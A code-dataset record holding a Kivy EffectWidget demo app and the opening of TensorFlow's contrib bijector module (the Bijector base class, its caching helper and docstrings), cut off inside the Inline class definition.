] | permissive | kivy/kivy | ba2668bffe4e125fd1c5aace54f671343802850e | ca1b918c656f23e401707388f25f4a63d9b8ae7d | refs/heads/master | 2023-09-04T02:27:05.311875 | 2023-08-26T08:00:20 | 2023-08-26T08:00:20 | 1,049,095 | 16,076 | 4,161 | MIT | 2023-09-09T07:55:18 | 2010-11-03T20:27:32 | Python | UTF-8 | Python | false | false | 5,485 | py | '''
Example usage of the effectwidget.
Currently highly experimental.
'''
from kivy.app import App
from kivy.uix.effectwidget import EffectWidget
from kivy.uix.spinner import Spinner
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.properties import ObjectProperty
from kivy.uix.effectwidget import (MonochromeEffect,
InvertEffect,
ChannelMixEffect,
ScanlinesEffect,
FXAAEffect,
PixelateEffect,
HorizontalBlurEffect,
VerticalBlurEffect)
class ComparisonWidget(EffectWidget):
pass
class EffectSpinner(Spinner):
pass
class SpinnerRow(BoxLayout):
effectwidget = ObjectProperty()
def update_effectwidget(self, *args):
effects = []
for child in self.children[::-1]:
text = child.text
if text == 'none':
pass
if text == 'fxaa':
effects.append(FXAAEffect())
if text == 'monochrome':
effects.append(MonochromeEffect())
if text == 'invert':
effects.append(InvertEffect())
if text == 'mix':
effects.append(ChannelMixEffect())
if text == 'blur_h':
effects.append(HorizontalBlurEffect())
if text == 'blur_v':
effects.append(VerticalBlurEffect())
if text == 'postprocessing':
effects.append(ScanlinesEffect())
if text == 'pixelate':
effects.append(PixelateEffect())
if self.effectwidget:
self.effectwidget.effects = effects
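# Annotation: the if-chain above could equally be table driven, e.g.:
#   _EFFECTS = {'fxaa': FXAAEffect, 'monochrome': MonochromeEffect, ...}
#   cls = _EFFECTS.get(text)
#   if cls:
#       effects.append(cls())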
example = Builder.load_string('''
#:import Vector kivy.vector.Vector
BoxLayout:
orientation: 'vertical'
FloatLayout:
ComparisonWidget:
pos_hint: {'x': 0, 'y': 0}
size_hint: 0.5, 1
id: effect1
ComparisonWidget:
pos_hint: {'x': pos_slider.value, 'y': 0}
size_hint: 0.5, 1
id: effect2
background_color: (rs.value, gs.value, bs.value, als.value)
SpinnerRow:
effectwidget: effect1
text: 'left effects'
SpinnerRow:
effectwidget: effect2
text: 'right effects'
BoxLayout:
size_hint_y: None
height: sp(40)
Label:
text: 'control overlap:'
Slider:
min: 0
max: 0.5
value: 0.5
id: pos_slider
BoxLayout:
size_hint_y: None
height: sp(40)
Label:
text: 'right bg r,g,b,a'
Slider:
min: 0
max: 1
value: 0
id: rs
Slider:
min: 0
max: 1
value: 0
id: gs
Slider:
min: 0
max: 1
value: 0
id: bs
Slider:
min: 0
max: 1
value: 0
id: als
<ComparisonWidget>:
Widget:
canvas:
Color:
rgba: 1, 0, 0, 1
Ellipse:
pos: Vector(self.pos) + 0.5*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 0, 1, 0.3, 1
Ellipse:
pos: Vector(self.pos) + 0.1*Vector(self.size)
size: 0.6*Vector(self.size)
Color:
rgba: 0.5, 0.3, 0.8, 1
Ellipse:
pos: Vector(self.pos) + Vector([0, 0.6])*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 1, 0.8, 0.1, 1
Ellipse:
pos: Vector(self.pos) + Vector([0.5, 0])*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 0, 0, 0.8, 1
Line:
points:
[self.x, self.y,
self.x + self.width, self.y + 0.3*self.height,
self.x + 0.2*self.width, self.y + 0.1*self.height,
self.x + 0.85*self.width, self.y + 0.72*self.height,
self.x + 0.31*self.width, self.y + 0.6*self.height,
self.x, self.top]
width: 1
Color:
rgba: 0, 0.9, 0.1, 1
Line:
points:
[self.x + self.width, self.y + self.height,
self.x + 0.35*self.width, self.y + 0.6*self.height,
self.x + 0.7*self.width, self.y + 0.15*self.height,
self.x + 0.2*self.width, self.y + 0.22*self.height,
self.x + 0.3*self.width, self.y + 0.92*self.height]
width: 2
<SpinnerRow>:
orientation: 'horizontal'
size_hint_y: None
height: dp(40)
text: ''
Label:
text: root.text
EffectSpinner:
on_text: root.update_effectwidget()
EffectSpinner:
on_text: root.update_effectwidget()
EffectSpinner:
on_text: root.update_effectwidget()
<EffectSpinner>:
text: 'none'
values:
['none', 'fxaa', 'monochrome',
'invert', 'mix',
'blur_h', 'blur_v',
'postprocessing', 'pixelate',]
''')
class EffectApp(App):
def build(self):
return example
EffectApp().run()
| [
"[email protected]"
] | |
5c0f91846cc2feeb9b6bc2da717f71a9af08ea58 | d99e5b65624f115db6982dd88af9390e8d766042 | /tensorflow/contrib/distributions/python/ops/bijector.py | 7a089bb53be8450af76210f20a513e17fe54b1c3 | [
"Apache-2.0"
] | permissive | golbin/tensorflow | 03dbecb6f093f5628c072086c780659bcc14dba8 | 8a58a304bdcf909f8b55ec49e9280fc3af01c7d3 | refs/heads/master | 2021-01-12T07:05:41.360503 | 2016-12-20T00:15:41 | 2016-12-20T00:15:41 | 76,907,006 | 2 | 0 | null | 2016-12-19T23:58:44 | 2016-12-19T23:58:43 | null | UTF-8 | Python | false | false | 93,743 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Bijector Ops.
An API for invertible, differentiable transformations of random variables.
## Background
Differentiable, bijective transformations of continuous random variables alter
the calculations made in the cumulative/probability distribution functions and
sample function. This module provides a standard interface for making these
manipulations.
For more details and examples, see the `Bijector` docstring.
To apply a `Bijector`, use `distributions.TransformedDistribution`.
## Bijectors
@@Affine
@@AffineLinearOperator
@@Bijector
@@Chain
@@CholeskyOuterProduct
@@Exp
@@Identity
@@Inline
@@Invert
@@PowerTransform
@@SigmoidCentered
@@SoftmaxCentered
@@Softplus
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import itertools
import math
import re
import numpy as np
import six
from tensorflow.contrib import framework as contrib_framework
from tensorflow.contrib.distributions.python.ops import operator_pd_cholesky
from tensorflow.contrib.distributions.python.ops import operator_pd_diag
from tensorflow.contrib.distributions.python.ops import operator_pd_identity
from tensorflow.contrib.distributions.python.ops import operator_pd_vdvt_update
from tensorflow.contrib.distributions.python.ops.shape import _DistributionShape
from tensorflow.contrib.linalg.python.ops import linear_operator
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
__all__ = [
"Affine",
"AffineLinearOperator",
"Bijector",
"Chain",
"CholeskyOuterProduct",
"Exp",
"Identity",
"Inline",
"Invert",
"PowerTransform",
"SigmoidCentered",
"SoftmaxCentered",
"Softplus",
]
# TODO(jvdillon): deprecate this function once tf.expm1 exists.
def _expm1(x):
"""Approximate exp{y}-1~=y for small |y|, and exp{y}-1 elsewhere."""
# Recall, eps is smallest positive number such that 1 + eps != 1.
eps = np.finfo(x.dtype.base_dtype.as_numpy_dtype).eps
# Note we are careful to never send an NaN through ANY branch of where.
return array_ops.where(math_ops.less(math_ops.abs(x), eps),
x, math_ops.exp(x) - 1.)
def _as_tensor(x, name):
"""Convenience to convert to `Tensor` or leave as `None`."""
return None if x is None else ops.convert_to_tensor(x, name=name)
class _Mapping(collections.namedtuple("_Mapping",
["x", "y", "ildj", "condition_kwargs"])):
"""Helper class to make it easier to manage caching in `Bijector`."""
def __new__(cls, x=None, y=None, ildj=None, condition_kwargs=None):
"""Custom __new__ so namedtuple items have defaults.
Args:
x: `Tensor`. Forward.
y: `Tensor`. Inverse.
ildj: `Tensor`. Inverse log det Jacobian.
condition_kwargs: Python dictionary. Extra args supplied to
forward/inverse/etc functions.
Returns:
mapping: New instance of _Mapping.
"""
return super(_Mapping, cls).__new__(cls, x, y, ildj, condition_kwargs)
@property
def x_key(self):
"""Returns key used for caching Y=g(X)."""
return (self.x,) + self._deep_tuple(tuple(sorted(
self.condition_kwargs.items())))
@property
def y_key(self):
"""Returns key used for caching X=g^{-1}(Y)."""
return (self.y,) + self._deep_tuple(tuple(sorted(
self.condition_kwargs.items())))
def merge(self, x=None, y=None, ildj=None,
condition_kwargs=None, mapping=None):
"""Returns new _Mapping with args merged with self.
Args:
x: `Tensor`. Forward.
y: `Tensor`. Inverse.
ildj: `Tensor`. Inverse log det Jacobian.
condition_kwargs: Python dictionary. Extra args supplied to
forward/inverse/etc functions.
mapping: Instance of _Mapping to merge. Can only be specified if no other
arg is specified.
Returns:
mapping: New instance of `_Mapping` which has inputs merged with self.
Raises:
ValueError: if mapping and any other arg is not `None`.
"""
if mapping is None:
mapping = _Mapping(x=x, y=y, ildj=ildj,
condition_kwargs=condition_kwargs)
elif not all(arg is None for arg in [x, y, ildj, condition_kwargs]):
raise ValueError("Cannot specify mapping and individual args.")
return _Mapping(
x=self._merge(self.x, mapping.x),
y=self._merge(self.y, mapping.y),
ildj=self._merge(self.ildj, mapping.ildj),
condition_kwargs=self._merge(self.condition_kwargs,
mapping.condition_kwargs))
def _merge(self, old, new):
"""Helper to merge which handles merging one value."""
if old is None:
return new
elif new is not None and old != new:
raise ValueError("Incompatible values: %s != %s" % (old, new))
return old
def _deep_tuple(self, x):
"""Converts lists of lists to tuples of tuples."""
return (tuple(map(self._deep_tuple, x))
if isinstance(x, (list, tuple)) else x)
@six.add_metaclass(abc.ABCMeta)
class Bijector(object):
"""Interface for transforming a `Distribution` sample.
A `Bijector` implements a
[diffeomorphism](https://en.wikipedia.org/wiki/Diffeomorphism), i.e., a
bijective, differentiable function. A `Bijector` is used by
`TransformedDistribution` but can be generally used for transforming a
`Distribution` generated `Tensor`. A `Bijector` is characterized by three
operations:
1. Forward Evaluation
Useful for turning one random outcome into another random outcome from a
different distribution.
2. Inverse Evaluation
Useful for "reversing" a transformation to compute one probability in
terms of another.
3. (log o det o Jacobian o inverse)(x)
"The log of the determinant of the matrix of all first-order partial
derivatives of the inverse function."
Useful for inverting a transformation to compute one probability in terms
of another. Geometrically, the det(Jacobian) is the volume of the
transformation and is used to scale the probability.
By convention, transformations of random variables are named in terms of the
forward transformation. The forward transformation creates samples, the
inverse is useful for computing probabilities.
Example Use:
- Basic properties:
```python
x = ... # A tensor.
# Evaluate forward transformation.
fwd_x = my_bijector.forward(x)
x == my_bijector.inverse(fwd_x)
x != my_bijector.forward(fwd_x) # Not equal because g(x) != g(g(x)).
```
- Computing a log-likelihood:
```python
def transformed_log_pdf(bijector, log_pdf, x):
return (bijector.inverse_log_det_jacobian(x) +
log_pdf(bijector.inverse(x)))
```
- Transforming a random outcome:
```python
def transformed_sample(bijector, x):
return bijector.forward(x)
```
Example transformations:
- "Exponential"
```
Y = g(X) = exp(X)
X ~ Normal(0, 1) # Univariate.
```
Implies:
```
g^{-1}(Y) = log(Y)
|Jacobian(g^{-1})(y)| = 1 / y
Y ~ LogNormal(0, 1), i.e.,
prob(Y=y) = |Jacobian(g^{-1})(y)| * prob(X=g^{-1}(y))
= (1 / y) Normal(log(y); 0, 1)
```
Here is an example of how one might implement the `Exp` bijector:
```
class Exp(Bijector):
def __init__(self, event_ndims=0, validate_args=False, name="exp"):
super(Exp, self).__init__(batch_ndims=0, event_ndims=event_ndims,
validate_args=validate_args, name=name)
def _forward(self, x):
return math_ops.exp(x)
def _inverse_and_inverse_log_det_jacobian(self, y):
x = math_ops.log(y)
return x, -self._forward_log_det_jacobian(x)
def _forward_log_det_jacobian(self, x):
if self.shaper is None:
raise ValueError("Jacobian requires known event_ndims.")
_, _, event_dims = self.shaper.get_dims(x)
return math_ops.reduce_sum(x, reduction_indices=event_dims)
```
- "Affine"
```
Y = g(X) = sqrtSigma * X + mu
X ~ MultivariateNormal(0, I_d)
```
Implies:
```
g^{-1}(Y) = inv(sqrtSigma) * (Y - mu)
|Jacobian(g^{-1})(y)| = det(inv(sqrtSigma))
Y ~ MultivariateNormal(mu, sqrtSigma) , i.e.,
prob(Y=y) = |Jacobian(g^{-1})(y)| * prob(X=g^{-1}(y))
= det(sqrtSigma)^(-d) *
MultivariateNormal(inv(sqrtSigma) * (y - mu); 0, I_d)
```
Example of why a `Bijector` needs to understand sample, batch, event
partitioning:
- Consider the `Exp` `Bijector` applied to a `Tensor` which has sample, batch,
and event (S, B, E) shape semantics. Suppose
the `Tensor`'s partitioned-shape is `(S=[4], B=[2], E=[3, 3])`.
For `Exp`, the shape of the `Tensor` returned by `forward` and `inverse` is
unchanged, i.e., `[4, 2, 3, 3]`. However the shape returned by
`inverse_log_det_jacobian` is `[4, 2]` because the Jacobian is a reduction
over the event dimensions.
Subclass Requirements:
- Typically subclasses implement `_forward` and one or both of:
- `_inverse`, `_inverse_log_det_jacobian`,
- `_inverse_and_inverse_log_det_jacobian`.
- If the `Bijector`'s use is limited to `TransformedDistribution` (or friends
like `QuantizedDistribution`) then depending on your use, you may not need
to implement all of `_forward` and `_inverse` functions. Examples:
1. Sampling (e.g., `sample`) only requires `_forward`.
2. Probability functions (e.g., `prob`, `cdf`, `survival`) only require
`_inverse` (and related).
3. Only calling probability functions on the output of `sample` means
`_inverse` can be implemented as a cache lookup.
See `Example Use` [above] which shows how these functions are used to
transform a distribution. (Note: `_forward` could theoretically be
implemented as a cache lookup but this would require controlling the
underlying sample generation mechanism.)
- If computation can be shared among `_inverse` and
`_inverse_log_det_jacobian` it is preferable to implement
`_inverse_and_inverse_log_det_jacobian`. This usually reduces
graph-construction overhead because a `Distribution`'s implementation of
`log_prob` will need to evaluate both the inverse Jacobian as well as the
inverse function.
- If an additional use case needs just `inverse` or just
`inverse_log_det_jacobian` then he or she may also wish to implement these
functions to avoid computing the `inverse_log_det_jacobian` or the
`inverse`, respectively.
- Subclasses should implement `_get_forward_event_shape`,
`_forward_event_shape` (and `inverse` counterparts) if the transformation is
shape-changing. By default the event-shape is assumed unchanged from input.
Tips for implementing `_inverse` and `_inverse_log_det_jacobian`:
- As case 3 [above] indicates, under some circumstances the inverse function
can be implemented as a cache lookup.
- The inverse `log o det o Jacobian` can be implemented as the negative of the
forward `log o det o Jacobian`. This is useful if the `inverse` is
implemented as a cache or the inverse Jacobian is computationally more
expensive (e.g., `CholeskyOuterProduct` `Bijector`). The following
demonstrates the suggested implementation.
```python
  def _inverse_and_inverse_log_det_jacobian(self, y):
    x = # ... implement inverse, possibly via cache.
    return x, -self._forward_log_det_jacobian(x)  # Note negation.
```
  By overriding the `_inverse_and_inverse_log_det_jacobian` function we have
  access to the inverse in one call.
The correctness of this approach can be seen from the following claim.
- Claim:
Assume `Y=g(X)` is a bijection whose derivative exists and is nonzero
for its domain, i.e., `d/dX g(X)!=0`. Then:
```none
(log o det o jacobian o g^{-1})(Y) = -(log o det o jacobian o g)(X)
```
- Proof:
From the bijective, nonzero differentiability of `g`, the
[inverse function theorem](
https://en.wikipedia.org/wiki/Inverse_function_theorem)
implies `g^{-1}` is differentiable in the image of `g`.
Applying the chain rule to `y = g(x) = g(g^{-1}(y))` yields
`I = g'(g^{-1}(y))*g^{-1}'(y)`.
The same theorem also implies `g{-1}'` is non-singular therefore:
`inv[ g'(g^{-1}(y)) ] = g^{-1}'(y)`.
The claim follows from [properties of determinant](
https://en.wikipedia.org/wiki/Determinant#Multiplicativity_and_matrix_groups).
- If possible, prefer a direct implementation of the inverse Jacobian. This
should have superior numerical stability and will often share subgraphs with
the `_inverse` implementation.
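  A quick numeric check of the claim (an annotation, using the `Exp`
  bijector defined later in this module):

  ```python
  exp = Exp()  # scalar events (event_ndims=0)
  x = tf.constant(2.)
  y = exp.forward(x)  # == exp(2.)
  # exp.forward_log_det_jacobian(x) evaluates to x, while
  # exp.inverse_log_det_jacobian(y) evaluates to -log(y) == -x,
  # i.e., the two log-det-Jacobians are negatives of each other.
  ```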
"""
@abc.abstractmethod
def __init__(self,
batch_ndims=None,
event_ndims=None,
graph_parents=None,
is_constant_jacobian=False,
validate_args=False,
dtype=None,
name=None):
"""Constructs Bijector.
A `Bijector` transforms random variables into new random variables.
Examples:
```python
# Create the Y = g(X) = X transform which operates on 4-Tensors of vectors.
identity = Identity(batch_ndims=4, event_ndims=1)
# Create the Y = g(X) = exp(X) transform which operates on matrices.
exp = Exp(batch_ndims=0, event_ndims=2)
```
See `Bijector` subclass docstring for more details and specific examples.
Args:
batch_ndims: number of dimensions associated with batch coordinates.
event_ndims: number of dimensions associated with event coordinates.
graph_parents: Python list of graph prerequisites of this `Bijector`.
is_constant_jacobian: `Boolean` indicating that the Jacobian is not a
function of the input.
validate_args: `Boolean`, default `False`. Whether to validate input with
asserts. If `validate_args` is `False`, and the inputs are invalid,
correct behavior is not guaranteed.
dtype: `tf.dtype` supported by this `Bijector`. `None` means dtype is not
enforced.
name: The name to give Ops created by the initializer.
"""
if batch_ndims is None or event_ndims is None:
self._shaper = None # Apparently subclass will create.
else:
self._shaper = _DistributionShape(
batch_ndims=batch_ndims,
event_ndims=event_ndims,
validate_args=validate_args)
self._graph_parents = graph_parents or []
self._is_constant_jacobian = is_constant_jacobian
self._validate_args = validate_args
self._dtype = dtype
self._from_y = {}
self._from_x = {}
# Using abbreviation ildj for "inverse log det Jacobian."
# This variable is not `None` iff is_constant_jacobian is `True`.
self._constant_ildj = None
if name:
self._name = name
else:
# We want the default convention to be snake_case rather than CamelCase
# since `Chain` uses bijector.name as the condition_kwargs dictionary key.
def camel_to_snake(name):
s1 = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", name)
return re.sub("([a-z0-9])([A-Z])", r"\1_\2", s1).lower()
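      # e.g., camel_to_snake("CholeskyOuterProduct") -> "cholesky_outer_product"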
self._name = camel_to_snake(type(self).__name__)
@property
def shaper(self):
"""Returns shape object used to manage shape constraints."""
return self._shaper
@property
def graph_parents(self):
"""Returns this `Bijector`'s graph_parents as a Python list."""
return self._graph_parents
@property
def is_constant_jacobian(self):
"""Returns true iff the Jacobian is not a function of x.
Note: Jacobian is either constant for both forward and inverse or neither.
Returns:
`Boolean`.
"""
return self._is_constant_jacobian
@property
def validate_args(self):
"""Returns True if Tensor arguments will be validated."""
return self._validate_args
@property
def dtype(self):
"""dtype of `Tensor`s transformable by this distribution."""
return self._dtype
@property
def name(self):
"""Returns the string name of this `Bijector`."""
return self._name
def _forward_event_shape(self, input_shape):
"""Subclass implementation for `forward_event_shape` public function."""
return input_shape
def forward_event_shape(self, input_shape, name="forward_event_shape"):
"""Shape of a single sample from a single batch as an `int32` 1D `Tensor`.
Args:
input_shape: `Tensor`, `int32` vector indicating event-portion shape
passed into `forward` function.
name: name to give to the op
Returns:
forward_event_shape: `Tensor`, `int32` vector indicating event-portion
shape after applying `forward`.
"""
with self._name_scope(name, [input_shape]):
input_shape = ops.convert_to_tensor(input_shape, dtype=dtypes.int32,
name="input_shape")
return self._forward_event_shape(input_shape)
def _get_forward_event_shape(self, input_shape):
"""Subclass implementation for `get_forward_event_shape` public function."""
return input_shape
def get_forward_event_shape(self, input_shape):
"""Shape of a single sample from a single batch as a `TensorShape`.
Same meaning as `forward_event_shape`. May be only partially defined.
Args:
input_shape: `TensorShape` indicating event-portion shape passed into
`forward` function.
Returns:
forward_event_shape: `TensorShape` indicating event-portion shape after
applying `forward`. Possibly unknown.
"""
return self._get_forward_event_shape(tensor_shape.TensorShape(input_shape))
def _inverse_event_shape(self, output_shape):
"""Subclass implementation for `inverse_event_shape` public function."""
return output_shape
def inverse_event_shape(self, output_shape, name="inverse_event_shape"):
"""Shape of a single sample from a single batch as an `int32` 1D `Tensor`.
Args:
output_shape: `Tensor`, `int32` vector indicating event-portion shape
passed into `inverse` function.
name: name to give to the op
Returns:
inverse_event_shape: `Tensor`, `int32` vector indicating event-portion
shape after applying `inverse`.
"""
with self._name_scope(name, [output_shape]):
output_shape = ops.convert_to_tensor(output_shape, dtype=dtypes.int32,
name="output_shape")
return self._inverse_event_shape(output_shape)
def _get_inverse_event_shape(self, output_shape):
"""Subclass implementation for `get_inverse_event_shape` public function."""
    return output_shape
def get_inverse_event_shape(self, output_shape):
"""Shape of a single sample from a single batch as a `TensorShape`.
Same meaning as `inverse_event_shape`. May be only partially defined.
Args:
output_shape: `TensorShape` indicating event-portion shape passed into
`inverse` function.
Returns:
inverse_event_shape: `TensorShape` indicating event-portion shape after
applying `inverse`. Possibly unknown.
"""
    return self._get_inverse_event_shape(
        tensor_shape.TensorShape(output_shape))
def _forward(self, x):
"""Subclass implementation for `forward` public function."""
raise NotImplementedError("forward not implemented.")
def forward(self, x, name="forward", **condition_kwargs):
"""Returns the forward `Bijector` evaluation, i.e., X = g(Y).
Args:
x: `Tensor`. The input to the "forward" evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
TypeError: if `self.dtype` is specified and `x.dtype` is not
`self.dtype`.
NotImplementedError: if `_forward` is not implemented.
"""
with self._name_scope(name, [x]):
x = ops.convert_to_tensor(x, name="x")
self._maybe_assert_dtype(x)
mapping = self._lookup(x=x, condition_kwargs=condition_kwargs)
if mapping.y is not None:
return mapping.y
mapping = mapping.merge(y=self._forward(x, **condition_kwargs))
self._cache(mapping)
return mapping.y
def _inverse(self, y):
"""Subclass implementation for `inverse` public function."""
raise NotImplementedError("inverse not implemented")
def inverse(self, y, name="inverse", **condition_kwargs):
"""Returns the inverse `Bijector` evaluation, i.e., X = g^{-1}(Y).
Args:
y: `Tensor`. The input to the "inverse" evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
TypeError: if `self.dtype` is specified and `y.dtype` is not
`self.dtype`.
NotImplementedError: if neither `_inverse` nor
`_inverse_and_inverse_log_det_jacobian` are implemented.
"""
with self._name_scope(name, [y]):
y = ops.convert_to_tensor(y, name="y")
self._maybe_assert_dtype(y)
mapping = self._lookup(y=y, condition_kwargs=condition_kwargs)
if mapping.x is not None:
return mapping.x
ildj = None
try:
x = self._inverse(y, **condition_kwargs)
except NotImplementedError as original_error:
# Since _inverse was not implemented, try to see if it's implemented
# by the _inverse_and_inverse_log_det_jacobian member.
try:
x, ildj = self._inverse_and_inverse_log_det_jacobian(
y, **condition_kwargs)
except NotImplementedError:
raise original_error
if self._constant_ildj is not None:
ildj = self._constant_ildj # Use the "global" result.
elif self.is_constant_jacobian:
self._constant_ildj = ildj
x = x if mapping.x is None else mapping.x
mapping = mapping.merge(x=x, ildj=ildj)
self._cache(mapping)
return mapping.x
def _inverse_log_det_jacobian(self, y):
"""Subclass implementation for `inverse_log_det_jacobian` public function.""" # pylint: disable=line-too-long
raise NotImplementedError("inverse_log_det_jacobian not implemented.")
def inverse_log_det_jacobian(
self, y, name="inverse_log_det_jacobian", **condition_kwargs):
"""Returns the (log o det o Jacobian o inverse)(y).
Mathematically, returns: `log(det(dX/dY))(Y)`. (Recall that: `X=g^{-1}(Y)`.)
Note that `forward_log_det_jacobian` is the negative of this function.
Args:
y: `Tensor`. The input to the "inverse" Jacobian evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
TypeError: if `self.dtype` is specified and `y.dtype` is not
`self.dtype`.
NotImplementedError: if neither `_inverse_log_det_jacobian` nor
`_inverse_and_inverse_log_det_jacobian` are implemented.
"""
with self._name_scope(name, [y]):
if self._constant_ildj is not None:
return self._constant_ildj
y = ops.convert_to_tensor(y, name="y")
self._maybe_assert_dtype(y)
mapping = self._lookup(y=y, condition_kwargs=condition_kwargs)
if mapping.ildj is not None:
return mapping.ildj
try:
x = mapping.x
ildj = self._inverse_log_det_jacobian(y, **condition_kwargs)
except NotImplementedError as original_error:
# Since _inverse_log_det_jacobian was not implemented, try to see if
# it's implemented by the _inverse_and_inverse_log_det_jacobian member.
try:
x, ildj = self._inverse_and_inverse_log_det_jacobian(
y, **condition_kwargs)
except NotImplementedError:
raise original_error
      if self.is_constant_jacobian:
        self._constant_ildj = ildj
      x = x if mapping.x is None else mapping.x
mapping = mapping.merge(x=x, ildj=ildj)
self._cache(mapping)
return mapping.ildj
def _inverse_and_inverse_log_det_jacobian(self, y):
"""Subclass implementation for `inverse_and_inverse_log_det_jacobian` public function.""" # pylint: disable=line-too-long
raise NotImplementedError(
"inverse_and_inverse_log_det_jacobian not implemented.")
def inverse_and_inverse_log_det_jacobian(
self, y, name="inverse_and_inverse_log_det_jacobian", **condition_kwargs):
"""Returns both the inverse evaluation and inverse_log_det_jacobian.
Enables possibly more efficient calculation when both inverse and
corresponding Jacobian are needed.
See `inverse()`, `inverse_log_det_jacobian()` for more details.
Args:
y: `Tensor`. The input to the "inverse" Jacobian evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
TypeError: if `self.dtype` is specified and `y.dtype` is not
`self.dtype`.
NotImplementedError: if neither `_inverse_and_inverse_log_det_jacobian`
nor {`_inverse`, `_inverse_log_det_jacobian`} are implemented.
"""
with self._name_scope(name, [y]):
y = ops.convert_to_tensor(y, name="y")
self._maybe_assert_dtype(y)
mapping = self._lookup(y=y, condition_kwargs=condition_kwargs)
if mapping.x is not None and mapping.ildj is not None:
return mapping.x, mapping.ildj
try:
x, ildj = self._inverse_and_inverse_log_det_jacobian(
y, **condition_kwargs)
except NotImplementedError as original_error:
# Since _inverse_and_inverse_log_det_jacobian was not implemented, try
# to see if we can separately use _inverse and
# _inverse_log_det_jacobian members.
try:
# We want this same try/except to catch either NotImplementedError.
x = self._inverse(y, **condition_kwargs)
if self._constant_ildj is None:
ildj = self._inverse_log_det_jacobian(y, **condition_kwargs)
except NotImplementedError:
raise original_error
if self._constant_ildj is not None:
ildj = self._constant_ildj # Ignore any ildj we may/not have.
elif self.is_constant_jacobian:
self._constant_ildj = ildj
# We use the mapped version of x, even if we re-computed x above with a
# call to self._inverse_and_inverse_log_det_jacobian. This prevents
# re-evaluation of the inverse in a common case.
x = x if mapping.x is None else mapping.x
mapping = mapping.merge(x=x, ildj=ildj)
self._cache(mapping)
return mapping.x, mapping.ildj
def _forward_log_det_jacobian(self, x):
"""Subclass implementation for `forward_log_det_jacobian` public function.""" # pylint: disable=line-too-long
raise NotImplementedError(
"forward_log_det_jacobian not implemented.")
def forward_log_det_jacobian(
self, x, name="forward_log_det_jacobian", **condition_kwargs):
"""Returns both the forward_log_det_jacobian.
Args:
x: `Tensor`. The input to the "forward" Jacobian evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
      TypeError: if `self.dtype` is specified and `x.dtype` is not
        `self.dtype`.
NotImplementedError: if neither `_forward_log_det_jacobian`
nor {`_inverse`, `_inverse_log_det_jacobian`} are implemented.
"""
with self._name_scope(name, [x]):
if self._constant_ildj is not None:
# Need "-1. *" to avoid invalid-unary-operand-type linter warning.
return -1. * self._constant_ildj
x = ops.convert_to_tensor(x, name="x")
self._maybe_assert_dtype(x)
mapping = self._lookup(x=x, condition_kwargs=condition_kwargs)
if mapping.ildj is not None:
return -mapping.ildj
y = None
try:
ildj = -self._forward_log_det_jacobian(x, **condition_kwargs)
except NotImplementedError as original_error:
try:
# We want this same try/except to catch either NotImplementedError.
          y = self.forward(x, **condition_kwargs) if y is None else y
ildj = self.inverse_log_det_jacobian(y, **condition_kwargs)
except NotImplementedError:
raise original_error
if self.is_constant_jacobian:
self._constant_ildj = ildj
y = y if mapping.y is None else mapping.y
mapping = mapping.merge(y=y, ildj=ildj)
self._cache(mapping)
return -mapping.ildj
@contextlib.contextmanager
def _name_scope(self, name=None, values=None):
"""Helper function to standardize op scope."""
with ops.name_scope(self.name):
with ops.name_scope(
name, values=(values or []) + self.graph_parents) as scope:
yield scope
def _maybe_assert_dtype(self, x):
"""Helper to check dtype when self.dtype is known."""
if self.dtype is not None and self.dtype.base_dtype != x.dtype.base_dtype:
raise TypeError("Input had dtype %s but expected %s." %
(self.dtype, x.dtype))
def _cache(self, mapping):
"""Helper which stores mapping info in forward/inverse dicts."""
if self._constant_ildj is not None:
# Fold in ildj if known constant Jacobian.
mapping = mapping.merge(ildj=self._constant_ildj)
# Merging from lookup is an added check that we're not overwriting anything
# which is not None.
mapping = mapping.merge(mapping=self._lookup(
mapping.x, mapping.y, mapping.condition_kwargs))
if mapping.x is None and mapping.y is None:
raise ValueError("Caching expects at least one of (x,y) to be known, "
"i.e., not None.")
self._from_x[mapping.x_key] = mapping
self._from_y[mapping.y_key] = mapping
def _lookup(self, x=None, y=None, condition_kwargs=None):
"""Helper which retrieves mapping info from forward/inverse dicts."""
mapping = _Mapping(x=x, y=y, condition_kwargs=condition_kwargs)
# Since _cache requires both x,y to be set, we only need to do one cache
# lookup since the mapping is always in both or neither.
if mapping.x is not None:
return self._from_x.get(mapping.x_key, mapping)
if mapping.y is not None:
return self._from_y.get(mapping.y_key, mapping)
return mapping
class Inline(Bijector):
# pylint: disable=line-too-long
"""Bijector constructed from callables implementing forward, inverse, and inverse_log_det_jacobian.
Example Use:
```python
exp = Inline(
forward_fn=tf.exp,
inverse_fn=tf.log,
inverse_log_det_jacobian_fn=(
lambda y: -tf.reduce_sum(tf.log(y), reduction_indices=-1)),
name="exp")
```
The above example is equivalent to the `Bijector` `Exp(event_ndims=1)`.
"""
# pylint: enable=line-too-long
def __init__(self,
